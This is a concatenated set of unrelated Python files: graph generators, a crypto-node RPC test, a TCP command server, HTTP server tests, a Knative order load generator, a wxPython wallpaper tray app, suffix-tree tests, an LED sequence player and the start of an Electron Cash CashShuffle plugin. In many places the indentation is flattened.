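    shared = manager.dict()
    proc = multiprocessing.Process(target=target, args=(shared,) + tuple(args))
    proc.start()
    proc.join(timeout_sec)
    if proc.is_alive():          # still running: kill it and report failure
        proc.terminate()
        proc.join()
        return None
    return shared.get('graph')   # None if the target raised before storing a result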
#####################################################################
if __name__=='__main__':
N= [256, 512, 1024, 2048, 4096]
Deg = [4, 6, 8, 10, 12]
default_dia = 0
default_dim = 128
for domain in ["social", "biology", "internet"]:
for deg in [4, 6, 8, 10, 12]:
stochastic_kronecker_graph(1024, deg, 0, 128, domain)
for n in [256, 512, 1024, 2048, 4096]:
stochastic_kronecker_graph(n, 8, 0, 128, domain)
# G, _, _ = barabasi_albert_graph(1024, 8, 0, 128)
# G,something = graph_util.get_lcc(G.to_directed())
# print(type(G))
# print(G)
import itertools
all_combos = list(itertools.product(*[N, Deg]))
# all_graphs = [watts_strogatz_graph, duplication_divergence_graph, powerlaw_cluster_graph, stochastic_block_model, r_mat_graph, hyperbolic_graph, stochastic_block_model]
# all_graph_names = ["watts_strogatz_graph",
# "duplication_divergence_graph", "powerlaw_cluster_graph", "stochastic_block_model", "r_mat_graph",
# "hyperbolic_graph", "stochastic_block_model"]
G, _, _ = lfr_benchmark_graph(1024, 8, 0, 128, None)  # domain is unused by this generator
print(type(G))
# all_graphs = [lfr_benchmark_graph]
# all_graph_names = ["lfr_benchmark_graph"]
#
# for ind, active_graph in enumerate(all_graphs):
# print('********************************** ',all_graph_names[ind])
# for combi in all_combos:
# best_graph, best_avg_deg, best_dia = active_graph(combi[0], combi[1], default_dia, default_dim)
# print('N : '+str(combi[0]) + ' Deg : ' + str(combi[1]) +' CURR_AVG_DEG : ',str(best_avg_deg), ' BEST_DIA : ', str(best_dia))
# print('_____________________________________________________________________________________')
# diam_list = []
# avg_deg_list = []
#
# graph_name = 'Barabasi Albert Graph'
# max_iters = 1000
# graph_name_diam = '../diam_plots/'+graph_name+'_diam_'+str(max_iters)
# graph_name_deg = '../diam_plots/' + graph_name + '_deg'+str(max_iters)
#
# while(len(diam_list))<max_iters:
# print('_____________________ ITER:',len(diam_list))
# G, avg_deg,diam = hyperbolic_graph(N=1024, deg=8,dia=0,dim=128)
# if np.round(abs(avg_deg - 8),1) <= 0.3:
#
# diam_list.append(diam)
# avg_deg_list.append(avg_deg)
# plot_hist(graph_name_diam, diam_list)
# plot_hist(graph_name_deg, avg_deg_list)
|
interface_rpc.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The thecoffeecoins Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests some generic aspects of the RPC interface."""
import os
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import thecoffeecoinsTestFramework
from test_framework.util import assert_equal, assert_greater_than_or_equal
from threading import Thread
import subprocess
def expect_http_status(expected_http_status, expected_rpc_code,
fcn, *args):
try:
fcn(*args)
raise AssertionError("Expected RPC error %d, got none" % expected_rpc_code)
except JSONRPCException as exc:
assert_equal(exc.error["code"], expected_rpc_code)
assert_equal(exc.http_status, expected_http_status)
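# The helper below keeps issuing RPCs via the CLI until one worker thread sees the
# "Work queue depth exceeded" error; the shared list doubles as a stop flag for all
# threads started by test_work_queue_exceeded().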
def test_work_queue_getblock(node, got_exceeded_error):
while not got_exceeded_error:
try:
node.cli('getrpcinfo').send_cli()
except subprocess.CalledProcessError as e:
assert_equal(e.output, 'error: Server response: Work queue depth exceeded\n')
got_exceeded_error.append(True)
class RPCInterfaceTest(thecoffeecoinsTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.supports_cli = False
def test_getrpcinfo(self):
self.log.info("Testing getrpcinfo...")
info = self.nodes[0].getrpcinfo()
assert_equal(len(info['active_commands']), 1)
command = info['active_commands'][0]
assert_equal(command['method'], 'getrpcinfo')
assert_greater_than_or_equal(command['duration'], 0)
assert_equal(info['logpath'], os.path.join(self.nodes[0].datadir, self.chain, 'debug.log'))
def test_batch_request(self):
self.log.info("Testing basic JSON-RPC batch request...")
results = self.nodes[0].batch([
# A basic request that will work fine.
{"method": "getblockcount", "id": 1},
# Request that will fail. The whole batch request should still
# work fine.
{"method": "invalidmethod", "id": 2},
# Another call that should succeed.
{"method": "getblockhash", "id": 3, "params": [0]},
])
result_by_id = {}
for res in results:
result_by_id[res["id"]] = res
assert_equal(result_by_id[1]['error'], None)
assert_equal(result_by_id[1]['result'], 0)
assert_equal(result_by_id[2]['error']['code'], -32601)
assert_equal(result_by_id[2]['result'], None)
assert_equal(result_by_id[3]['error'], None)
assert result_by_id[3]['result'] is not None
def test_http_status_codes(self):
self.log.info("Testing HTTP status codes for JSON-RPC requests...")
expect_http_status(404, -32601, self.nodes[0].invalidmethod)
expect_http_status(500, -8, self.nodes[0].getblockhash, 42)
def test_work_queue_exceeded(self):
self.log.info("Testing work queue exceeded...")
self.restart_node(0, ['-rpcworkqueue=1', '-rpcthreads=1'])
got_exceeded_error = []
threads = []
for _ in range(3):
t = Thread(target=test_work_queue_getblock, args=(self.nodes[0], got_exceeded_error))
t.start()
threads.append(t)
for t in threads:
t.join()
def run_test(self):
self.test_getrpcinfo()
self.test_batch_request()
self.test_http_status_codes()
self.test_work_queue_exceeded()
if __name__ == '__main__':
RPCInterfaceTest().main()
|
TCP.py
|
#!/usr/bin/python
from socket import *
import multiprocessing, time, signal, os, sys, threading, socket
from threading import Thread
PORT = 10000
IP = ""
class TCP(object):
tcp = None
def __init__(self):
self.server_socket = socket.socket(AF_INET, SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_socket.bind( (IP, PORT) )
self.server_socket.listen(1)
self.thread_tcp = Thread(target = self.run)
self.thread_tcp.start()
self.command = ""
self.active = False
TCP.tcp = self
def isConnected(self):
"""
        :return: True if the connection is active
"""
return self.active
def set_command(self, command):
self.command = command
def get_command(self):
temp = self.command
self.command = ""
return temp
def send_to_basestation(self, key, value):
"""
        Sends information back to the basestation. Can only execute if the
        connection is active.
"""
if self.active:
# connection is active, send
try:
message = "<<<<" + key + "," + value + ">>>>"
# appending \n to the message as java reader socket blocks until new line is encountered
self.connectionSocket.send(message + "\n")
except socket.error as e:
print("Send failed")
else:
print("Send failed")
def run(self):
while TCP.tcp is None:
time.sleep(1)
while True:
print("Waiting for connection")
self.connectionSocket, self.addr = self.server_socket.accept()
self.connectionSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print("Connection accepted")
self.active=True
while self.active:
command = ""
while self.active:
try:
lastLen = len(command)
command += self.connectionSocket.recv(1024).decode()
if lastLen == len(command):
print("Connection Lost")
self.active = False
lastLen = -1
break
except socket.error as e:
print("Connection Lost")
self.active = False
break
end_index = command.find(">>>>")
# In case of command overload
while end_index > 0:
self.set_command(command[0:end_index+4])
command = command[end_index+4:]
end_index = command.find(">>>>")
|
test_all_ctrls.py
|
# coding: utf-8
import os
from typing import Dict
import websocket
import unittest
from threading import Thread
from time import sleep
import urllib.request
import urllib.error
import http.client
from simple_http_server.logger import get_logger, set_level
import simple_http_server.server as server
set_level("DEBUG")
_logger = get_logger("http_test")
class HttpRequestTest(unittest.TestCase):
PORT = 9090
WAIT_COUNT = 10
@classmethod
def start_server(clz):
_logger.info("start server in background. ")
root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
server.scan(project_dir=root, base_dir="tests/ctrls", regx=r'.*controllers.*')
server.start(
port=clz.PORT,
resources={"/public/*": f"{root}/tests/static"},
prefer_coroutine=True)
@classmethod
def setUpClass(clz):
Thread(target=clz.start_server, daemon=False, name="t").start()
retry = 0
while not server.is_ready():
sleep(1)
retry = retry + 1
_logger.info(f"server is not ready wait. {retry}/{clz.WAIT_COUNT} ")
if retry >= clz.WAIT_COUNT:
raise Exception("Server start wait timeout.")
@classmethod
def tearDownClass(clz):
try:
server.stop()
except:
pass
@classmethod
def visit(clz, ctx_path, headers: Dict[str, str] = {}, data=None, return_type: str = "TEXT"):
req: urllib.request.Request = urllib.request.Request(f"http://127.0.0.1:{clz.PORT}/{ctx_path}")
for k, v in headers.items():
req.add_header(k, v)
res: http.client.HTTPResponse = urllib.request.urlopen(req, data=data)
if return_type == "RESPONSE":
return res
elif return_type == "HEADERS":
headers = res.headers
res.close()
return headers
else:
txt = res.read().decode("utf-8")
res.close()
return txt
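    # visit() is the shared HTTP helper for the tests below: return_type selects the raw
    # HTTPResponse ("RESPONSE"), just the response headers ("HEADERS"), or the decoded
    # body text (the default "TEXT").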
def test_header_echo(self):
res: http.client.HTTPResponse = self.visit(f"header_echo", headers={"X-KJ-ABC": "my-headers"}, return_type="RESPONSE")
assert "X-Kj-Abc" in res.headers
assert res.headers["X-Kj-Abc"] == "my-headers"
def test_static(self):
txt = self.visit("public/a.txt")
assert txt == "hello world!"
def test_path_value(self):
pval = "abc"
path_val = "xyz"
txt = self.visit(f"path_values/{pval}/{path_val}/x")
assert txt == f"<html><body>{pval}, {path_val}</body></html>"
def test_error(self):
try:
self.visit("error")
except urllib.error.HTTPError as err:
assert err.code == 400
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == "code:400, message: Parameter Error!, explain: Test Parameter Error!"
def test_coroutine(self):
txt = self.visit(f"%E4%B8%AD%E6%96%87/coroutine?hey=KJ2")
assert txt == "Success! KJ2"
def test_filter(self):
res: http.client.HTTPResponse = self.visit(f"tuple?user_name=kj&pass=wu", return_type="RESPONSE")
assert "Res-Filter-Header" in res.headers
assert res.headers["Res-Filter-Header"] == "from-filter"
def test_exception(self):
try:
self.visit("exception")
except urllib.error.HTTPError as err:
assert err.code == 500
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == '500-Internal Server Error-some error occurs!'
def test_ws(self):
ws = websocket.WebSocket()
path_val = "test"
msg = "hello websocket!"
ws.connect(f"ws://127.0.0.1:{self.PORT}/ws/{path_val}")
ws.send(msg)
txt = ws.recv()
ws.close()
assert txt == f"{path_val}-{msg}"
|
genorders.py
|
from multiprocessing import Pool, TimeoutError
import time
import os
import requests
import sys
import itertools
import threading
import queue
import random
import uuid
import datetime
import json
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
endpoint = "http://orders-kn-channel.kcontainer.svc.cluster.local"
#endpoint = "http://springcontainerms-service.kcontainer.127.0.0.1.nip.io/orderevents"
eventtype = "OrderCreated"
def memoryless_idle_time(rate):
    # Memoryless (Poisson) arrivals: inter-arrival times are exponentially
    # distributed with mean 1/rate.
    return random.expovariate(rate)
def gaussian_idle_time(rate):
    # Gaussian inter-arrival times centred on the mean 1/rate; the standard
    # deviation of 1/(4*rate) is an assumed choice, and the result is clamped at 0.
    return max(0.0, random.gauss(1/rate, 0.25/rate))
class Counter:
def __init__(self):
self.number_of_read = 0
self.counter = itertools.count()
self.lock = threading.Lock()
def inc(self):
next(self.counter)
def value(self):
with self.lock:
value = next(self.counter) - self.number_of_read
self.number_of_read += 1
return value
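# Counter.value() consumes one tick of the itertools counter itself, then subtracts the
# number of previous reads so that only inc() calls are reported; next() on an
# itertools.count() is effectively atomic in CPython, so inc() needs no lock.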
def createOrder():
addresses = [
{"street": "100 Main street", "city": "Oakland", "country": "USA", "state": "CA", "zipcode": "94501"},
{"street": "150 Meilong Road", "city": "Shanghai", "country": "China", "state": "", "zipcode": "200237"},
{"street": "476 9th Ave", "city": "NYC", "country": "USA", "state": "NY", "zipcode": "10018"},
{"street": "27-28, Rail Arch, New Mill Rd, Nine Elms", "city": "London", "country": "United Kingdom", "state": "", "zipcode": "SW8 5PP"},
{"street": "1628, 2095 Jerrold Ave", "city": "San Francisco", "country": "USA", "state": "CA", "zipcode": "94124"}
]
manuf = ['GoodManuf','OtherManuf']
products = ['Fresh product 1','Medical vaccin','Carrot','Fresh Product']
currentDate = datetime.datetime.now()
pickupDate = currentDate + datetime.timedelta(days=3)
expectedDeliveryDate = currentDate + datetime.timedelta(days=23)
# get a random index for pickup location
pickupIndex = random.randint(0, len(addresses)-1)
# get a random index for delivery location - and ensure not the same index of pickup
deliveryIndex = random.randint(0, len(addresses)-1)
while (pickupIndex == deliveryIndex):
deliveryIndex = random.randint(0, len(addresses)-1)
# get random indexes for the other arrays
manufIndex = random.randint(0, len(manuf)-1)
prodIndex = random.randint(0, len(products)-1)
payload = {
"orderID": str(uuid.uuid4()),
"productID": products[prodIndex],
"quantity": 1000,
"customerID": manuf[manufIndex],
"expectedDeliveryDate": expectedDeliveryDate.strftime("yyyy-MM-dd'T'HH:mm:ssXXX"),
"pickupDate": pickupDate.strftime("yyyy-MM-dd'T'HH:mm:ssXXX"),
"pickupAddress": addresses[pickupIndex],
"destinationAddress": addresses[deliveryIndex],
"status": "pending",
}
order = {
"timestamp": int(time.time() * 1000),
"version": 1,
"payload": payload,
"type": eventtype,
}
return order
def reqfunc():
#print("Sending:", knative_cluster)
#return requests.get(knative_cluster, headers={"Host": "greeter.knativetutorial.example.com"})
eventId = uuid.uuid4()
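    # CloudEvents-style binary-mode HTTP headers (CE-*) as consumed by Knative eventing;
    # only CE-ID varies between requests here.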
headers = {
"X-B3-Flags": "1",
"CE-SpecVersion": "1.0",
"CE-Type": "OrderEvent",
"CE-ID": str(eventId),
"CE-Source": "dev.knative.ordereventsource",
"Content-Type": "application/json"
}
order = json.dumps(createOrder())
# print(order)
return requests.post(endpoint, headers=headers, data=order)
sentRequests = Counter()
recvRequests = Counter()
succRequests = Counter()
pendingRequests = queue.Queue()
running = True
def generate_requests(pool, idle_time, rate, duration, final=True):
global sentRequests
global pendingRequests
global running
n = int(rate * duration)
for i in range(n):
res = pool.apply_async(func=reqfunc)
pendingRequests.put(res)
sentRequests.inc()
time.sleep(idle_time(rate))
if running != True:
break
if final:
running = False
def generate_ramp(pool, idle_time, rampup, srate, erate, stepsize, final):
global sentRequests
global pendingRequests
global running
rate = srate
while (srate < erate and rate < erate) or (srate > erate and rate > erate):
n = int(rate * stepsize)
for i in range(n):
res = pool.apply_async(func=reqfunc)
pendingRequests.put(res)
sentRequests.inc()
time.sleep(idle_time(rate))
if running != True:
break
rate += stepsize
    if final:
        # Mirror generate_requests(): the final generator phase stops the tracker.
        running = False
def tracking():
global sentRequests
global recvRequests
global succRequests
global pendingRequests
global running
while running:
num = pendingRequests.qsize()
waiting = []
for _ in range(num):
try:
res = pendingRequests.get_nowait()
if res.ready():
response = res.get()
recvRequests.inc()
if response.status_code == 200:
succRequests.inc()
else:
waiting.append(res)
except queue.Empty:
break
except:
eprint("Error occur when trying to read the response...")
for res in waiting:
pendingRequests.put(res)
        print(int(round(time.time() * 1000)), "Sent:", sentRequests.value(), "Received:", recvRequests.value(), "Succeeded:", succRequests.value())
time.sleep(1)
if __name__ == '__main__':
parallelism = 1
rate = 1.0
dist = "uniform"
duration = 10
if len(sys.argv) != 5:
eprint("Usage: python reqgen.py [parallelism] [rate] [duration] [uniform|memoryless|gaussian]")
exit(1)
else:
parallelism = int(sys.argv[1])
rate = float(sys.argv[2])
duration = int(sys.argv[3])
dist = sys.argv[4]
# Select arrival distribution
if dist == "uniform":
idle_time = lambda r: 1/r
elif dist == "memoryless":
idle_time = memoryless_idle_time
elif dist == "gaussian":
        idle_time = gaussian_idle_time
else:
print("Invalid arrival distribution:", dist)
exit(1)
if "eventtype" in os.environ:
eventtype = os.environ["eventtype"]
pool = Pool(processes=parallelism)
print("Generating new request, press [Ctrl + C] to stop")
running = True
sender = threading.Thread(target=generate_requests, args=(pool, idle_time, rate, duration))
sender.start()
tracker = threading.Thread(target=tracking)
tracker.start()
sender.join()
tracker.join()
|
ui.py
|
import os
import threading
import logging
import time
import wx
from .. import UI
class wxPython(UI):
def __init__(self, config):
super(wxPython, self).__init__(config)
self._initialize_gui()
self.app_paused = False
# App Control functions
def start_app(self):
logging.debug('Application and UI starting')
self.thread = threading.Thread(target=self.app.main)
        self.thread.daemon = True  # setDaemon() is deprecated in favour of the daemon attribute
self.thread.start()
self.ui_app.MainLoop()
def exit_app(self, *args, **kwargs):
self.tbicon.RemoveIcon()
self.ui_app.ExitMainLoop()
self.ui_app.Exit()
logging.debug('Application exited, goodbye!')
# wxEvents
def OnTaskBarRight(self, event):
self.tbicon.PopupMenu(self.menu)
def OnPauseSelected(self, event):
self.app.pause()
def OnUpdateTick(self, event):
# Set pause status tick and icon
        if self.app_paused != self.app.is_paused:
self.menu.Check(self.pitem.GetId(), self.app.is_paused)
if self.app.is_paused:
self.tbicon.SetIcon(self.pause_icon, "wpmaker")
else:
self.tbicon.SetIcon(self.run_icon, "wpmaker")
self.app_paused = self.app.is_paused
# Set collage activation status ticks
self._set_active_collage_tics()
# Set interval status ticks
self._set_interval_tics()
def OnCollage(self, event):
collage = self.collage_submenu_class_names[event.GetId()]
self.app.toggle_collage(collage, activate=event.IsChecked())
active_collages = ''
for csi in self.collage_submenu_items:
if self.collage_submenu.IsChecked(csi):
active_collages += ',%s' % self.collage_submenu_items[csi]
self.app.update_config_file('options', 'collage-plugins', active_collages[1:])
def OnInterval(self, event):
interval = self.interval_submenu_items[event.GetId()]
self.app.next_generation += interval - self.app.config['update']
self.app.config['update'] = interval
if self.app.next_generation > time.time():
logging.debug('Generation interval changed, waiting until %s' %
time.strftime('%X', time.localtime(self.app.next_generation)))
else:
logging.debug('Generation interval changed, starting generation...')
self.app.update_config_file('options', 'update', '%d' % interval)
def OnFolderSelect(self, event):
path = self._getWPFolder()
for source in self.app.plugin_manager['Source']:
# module name of the plugin
module = source.__module__.split('.')[1]
# set the folder source to path
if module == 'folder':
source.set_path(path)
self.app.update_config_file('folder', 'source', path)
# Following methods are called from the application, via ui hooks
def check_config(self, save_config):
if not self.config['folder.source'] or self.config['folder.source'] == 'None':
logging.debug('Sources not set, prompting for folder')
path = self._getWPFolder()
self.config['folder.source'] = path
save_config('folder', 'source', path)
def app_quitting(self):
        # Use CallAfter because app_quitting is called from another thread; GUI work must happen on the main thread
wx.CallAfter(self.exit_app)
def app_initialized(self, app):
self.app = app
self._initialize_menu()
def collage_toggled(self, collage_name, activated):
""" Called when collage plugin is (de)activated """
for csi in self.collage_submenu_items:
if self.collage_submenu_items[csi] == collage_name:
self.collage_submenu.Check(csi, activated)
# Following methods are called from within the class
def _initialize_gui(self):
logging.debug('initializing gui...')
#setup app
self.ui_app = wx.PySimpleApp()
#setup icon object
self.run_icon = wx.Icon("wpmaker.ico", wx.BITMAP_TYPE_ICO)
self.run_icon.SetHeight(32)
self.run_icon.SetWidth(32)
self.pause_icon = wx.Icon("wpmaker_paused.ico", wx.BITMAP_TYPE_ICO)
self.pause_icon.SetHeight(32)
self.pause_icon.SetWidth(32)
#setup taskbar icon
self.tbicon = wx.TaskBarIcon()
self.tbicon.SetIcon(self.run_icon, "wpmaker")
wx.EVT_TASKBAR_RIGHT_UP(self.tbicon, self.OnTaskBarRight)
def _initialize_menu(self):
#menu
self.menu = wx.Menu()
# action menu items
self.gitem = self.menu.Append(wx.ID_ANY, '&Generate', 'Generate new wallpaper')
self.pitem = self.menu.Append(wx.ID_ANY, '&Pause', 'Pause wallpaper generation', kind=wx.ITEM_CHECK)
self.menu.Check(self.pitem.GetId(), False)
self.menu.Append(wx.ID_SEPARATOR)
# configuration menu items
self.sel_dir_item = self.menu.Append(wx.ID_ANY, '&Select Folder', 'Select a new wallpaper folder')
self._create_collage_menu()
interval = self.app.config['update']
self.interval_submenu = wx.Menu()
self.interval_submenu_intervals = [60, 300, 600, 1800, 3600]
self.interval_submenu_items = {}
        if interval not in self.interval_submenu_intervals:
self.interval_submenu_intervals = [interval] + self.interval_submenu_intervals
submenu_item_index_start = 6000
submenu_item_index = submenu_item_index_start
for interval in self.interval_submenu_intervals:
if interval < 60:
interval_text = 'custom: %d sec' % interval
elif interval > 60 and submenu_item_index == 6000:
interval_text = 'custom: %d min' % (interval/60)
else:
interval_text = '%d min' % (interval/60)
self.interval_submenu_items[submenu_item_index] = interval
self.interval_submenu.Append(id=submenu_item_index,
text=interval_text,
kind=wx.ITEM_RADIO)
submenu_item_index += 1
self.ui_app.Bind(wx.EVT_MENU_RANGE, self.OnInterval, id=submenu_item_index_start, id2=submenu_item_index)
self.menu.AppendMenu(wx.ID_ANY, '&Interval', self.interval_submenu)
self.menu.Append(wx.ID_SEPARATOR)
self.qitem = self.menu.Append(wx.ID_EXIT, '&Quit', 'Quit application')
wx.EVT_MENU(self.tbicon, self.sel_dir_item.GetId(), self.OnFolderSelect)
wx.EVT_MENU(self.tbicon, self.gitem.GetId(), self.start_generating)
wx.EVT_MENU(self.tbicon, self.pitem.GetId(), self.OnPauseSelected)
wx.EVT_MENU(self.tbicon, self.qitem.GetId(), self.exit_app)
        # GUI update timer: ticks ~24 times per second so the menu check states track the app
self.timer = wx.Timer()
self.ui_app.Bind(wx.EVT_TIMER, self.OnUpdateTick, self.timer)
self.timer.Start(1000.0/24)
def _create_collage_menu(self):
submenu_item_index_start = 4000
submenu_item_index = submenu_item_index_start
self.collage_submenu = wx.Menu()
self.collage_submenu_items = {}
self.collage_submenu_class_names = {}
for cp in self.app.plugin_manager.plugins['Collage']:
class_name = cp.__name__
collage_name = cp.name
submenu_item_index += 1
self.collage_submenu_items[submenu_item_index] = collage_name
self.collage_submenu_class_names[submenu_item_index] = class_name
self.collage_submenu.Append(submenu_item_index,
collage_name,
collage_name,
kind=wx.ITEM_CHECK)
self._set_active_collage_tics()
self.ui_app.Bind(wx.EVT_MENU_RANGE, self.OnCollage, id=submenu_item_index_start, id2=submenu_item_index)
self.menu.AppendMenu(wx.ID_ANY, '&Collage', self.collage_submenu)
def _set_active_collage_tics(self):
self.active_collages = [c.__class__.__name__ for c in self.app.plugin_manager['Collage']]
for item_id in self.collage_submenu_class_names:
class_name = self.collage_submenu_class_names[item_id]
if class_name in self.active_collages:
self.collage_submenu.Check(item_id, True)
def _set_interval_tics(self):
interval = self.app.config['update']
for item_id in self.interval_submenu_items:
check = self.interval_submenu_items[item_id] == interval
self.interval_submenu.Check(item_id, check)
def _getWPFolder(self):
dialog = wx.DirDialog(None, message='Pick a directory', defaultPath=os.path.expanduser('~'))
path = None
if dialog.ShowModal() == wx.ID_OK:
path = dialog.GetPath()
dialog.Destroy()
return path
|
maintest.py
|
from suffixtree import *
import re
from threading import Thread
import threading
from memory_profiler import profile
import random
import time
import sys
charset = ['a','b','c','d','e','f','g']
strs = [
"abc",
"abcde",
"aabbcdeabc",
"123",
"1234",
"321",
"123321",
"hhhzzzzww",
"ttbb",
"ab1",
"12b",
"12",
"11",
"a1a",
"b",
"a2@",
"wwwr",
"AB1",
"aBC",
"cdD",
"CD",
"Cd"
]
tree = SuffixQueryTree(False)
tree.initStringsWithCache(strs)
allstr = tree.getStrings()
r = RegularExpSearch(tree)
charset = ['a','b','c','d','e','f','g']
def random_string(lens:int):
a = random.choices(charset,k=lens)
return "".join(a)
def create_dataset(n:int,l:int):
data =[
random_string(random.randint(0,5) + l)
for _ in range(n)
]
return data
def test1():
p = "[^bc23]+([b-c]+|2|3){2,}$"
t = r.searchString(p)
print("match strings: ",t)
t2 = [ i for i in strs if re.match(p,i) ]
print(t2)
assert set(t) == set(t2)
def test3():
print("Thread #: " + str( threading.get_ident() ))
p = "[^bc23]+([b-c]+|2|3){2,}$"
temp = 0
for i in range(1000):
s = r.st.getStrings()
t = r.searchPossibleStringIdx(p)
        time.sleep(0.01)
temp += len(t)
print(threading.get_ident(),i,len(t),len(s))
return temp
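# test3 repeatedly queries the shared SuffixQueryTree and is run from several threads by
# test2 below, presumably to exercise concurrent query safety.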
def test_simplesearch():
a = SimpleStringSearch(strs)
print(a.findString("a"))
print(a.findString("12"))
print(a.findString(["a", "b"]))
print(a.findString(["abc", "de"]))
print(a.findString(["aabbc", "de"]))
print(a.findString(["aabbc", "dde"]))
print(a.findString(["cd"]))
print(a.findString(["cd", "CD"]))
print(a.findString(["CD"]))
print("----------------------------------")
print(a.findString(["aabbc", "dde"],False))
print(a.findString(["cd"],False))
print(a.findString(["cd", "CD"],False))
print(a.findString(["CD"],False))
print(a.findString(["aB"],False))
print(a.findString(["C"],False))
print(a.findString(["C"],True))
print("----------------------------------")
print(a.findStringIdx("12"))
print(a.findStringIdx(["a", "b"]))
print(a.findStringIdx(["abc", "de"]))
print(a.findStringIdx(["aabbc", "de"]))
print(a.findStringIdx(["aabbc", "dde"]))
def benchmark_simplesearch():
import gc
n = 100000 * 50
test_n = 1000
data = create_dataset(n,20)
tl0 = time.time()
a = SimpleStringSearch(data)
tl1 = time.time()
print("finished dataset creation")
testdata = create_dataset(test_n, 3)
num = 0
t0 = time.time()
print(gc.get_stats())
for i in testdata:
#print(i)
temp = a.findStringIdx(i)
num += len(temp)
t1 = time.time()
print(num)
ctime = t1 - t0
print("creation time cost", tl1 - tl0,"total time cost", ctime, " avg time ", ctime / test_n)
print(gc.get_stats())
sys.stdin.readline()
def main():
t = r.searchPossibleStringIdx("(a\\d.|21)^")
result = list(map(lambda x:allstr[x],t))
print("possible: ",result)
t = r.searchString("^(a\\d.|21)")
print(t)
try:
t = tree.findStringIdx_wildCard(["1","12",SuffixQueryTree.CHAR_STRING_START])
print(t)
t = tree.findString_wildCard(["1","12",SuffixQueryTree.CHAR_STRING_END])
print(t)
except Exception as e:
print(e)
#test1()
#main()
def test2():
ts = [Thread(target = test3) for _ in range (5)]
for i in ts:
i.start()
for i in ts:
i.join()
#test2()
test_simplesearch()
#benchmark_simplesearch()
#from suffixtree.TestClass import *
#from suffixtree.TestClass import *
#import unittest
#unittest.main()
|
sequencePlayer.py
|
from threading import Thread
from time import sleep
import config as cfg
from sequencePlaylist import SequencePlaylist
from color import Color
from sequence import Sequence
class SequencePlayer:
def __init__(self):
self.currentplaylist = None
self.sequencethread = None
def runsequence(self, sequence: Sequence):
playlist = SequencePlaylist([sequence], sequence.name)
self.runplaylist(playlist)
def runplaylist(self, playlist: SequencePlaylist):
if self.currentplaylist == playlist:
return
if cfg.VERBOSE_LOGGING:
print("Running sequence {}".format(playlist.name))
self.currentplaylist = playlist
self.sequencethread = Thread(target=self.runthread)
self.sequencethread.start()
def stop(self):
self.stopcurrentplaylist()
sleep(2)
self.clear()
def runthread(self):
playlist = self.currentplaylist
loop = True
while loop:
sequence = playlist.getnext()
if playlist != self.currentplaylist:
break
for x in sequence.data:
if playlist != self.currentplaylist:
loop = False
break
self.setrangecolor(x.startid, x.endid, x.color, x.delay > 2)
if x.delay > 2:
sleep(max(x.delay, 10)/1000)
if playlist == self.currentplaylist:
self.sequencethread = None
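    # runthread() keeps a local reference to the playlist it was started with and bails
    # out as soon as self.currentplaylist changes; this is how runplaylist() and stop()
    # cancel a sequence that is already running.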
def stopcurrentplaylist(self):
self.currentplaylist = None
self.sequencethread = None
print("Stopping running sequence")
def clear(self):
self.setrangecolor(0, cfg.LED_COUNT, Color.black())
def setrangecolor(self, start, end, color, write=True):
if start == end:
self.setcolor(start, color, False)
else:
for i in range(min(start, end), min(max(start, end), cfg.LED_COUNT)):
self.setcolor(i, color, False)
    def setcolor(self, led, color, write=True):
        # No-op placeholder in this class; presumably overridden or wired up to the
        # hardware-specific LED write elsewhere (the write flag would control flushing).
        pass
|
qt.py
|
#!/usr/bin/env python3
#
# Cash Shuffle - CoinJoin for Bitcoin Cash
# Copyright (C) 2018-2019 Electron Cash LLC
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import json
import copy
import socket
import time
import threading
import queue
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash.plugins import BasePlugin, hook
from electroncash.i18n import _
from electroncash.util import print_error, profiler, PrintError, Weak, format_satoshis_plain, finalization_print_error
from electroncash.network import Network
from electroncash.address import Address
from electroncash.bitcoin import COINBASE_MATURITY
from electroncash.transaction import Transaction
from electroncash.simple_config import SimpleConfig, get_config
from electroncash.wallet import Abstract_Wallet
from electroncash_gui.qt.util import EnterButton, CancelButton, Buttons, CloseButton, HelpLabel, OkButton, rate_limited, ColorScheme, destroyed_print_error, AppModalDialog
from electroncash_gui.qt.password_dialog import PasswordDialog
from electroncash_gui.qt.main_window import ElectrumWindow
from electroncash_gui.qt.amountedit import BTCAmountEdit
from electroncash_gui.qt.utils import FixedAspectRatioSvgWidget
from electroncash_plugins.shuffle.client import BackgroundShufflingThread, ERR_SERVER_CONNECT, ERR_BAD_SERVER_PREFIX, MSG_SERVER_OK
from electroncash_plugins.shuffle.comms import query_server_for_stats, verify_ssl_socket
from electroncash_plugins.shuffle.conf_keys import ConfKeys # config keys per wallet and global
from electroncash_plugins.shuffle.coin_utils import CoinUtils
def is_coin_busy_shuffling(window, utxo_or_name):
''' Convenience wrapper for BackgroundShufflingThread.is_coin_busy_shuffling '''
bp = getattr(window, 'background_process', None)
return bool(bp and bp.is_coin_busy_shuffling(utxo_or_name))
